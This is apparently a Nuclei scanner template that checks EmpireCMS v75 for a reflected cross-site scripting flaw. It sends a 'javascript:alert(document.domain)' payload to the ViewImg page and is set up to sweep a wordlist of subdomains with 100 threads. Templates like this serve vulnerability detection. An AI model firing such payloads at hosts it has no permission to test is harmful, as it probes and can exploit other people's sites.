id: empirecms-xss
info:
  name: EmpireCMS v75 XSS
  author: pikpikcu
  severity: medium
  reference: https://www.geek-share.com/detail/2777280260.html
  tags: empirecms,xss
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'onmousewheel=\"return bbimg(this)\"'
      - type: status
        status:
          - 200
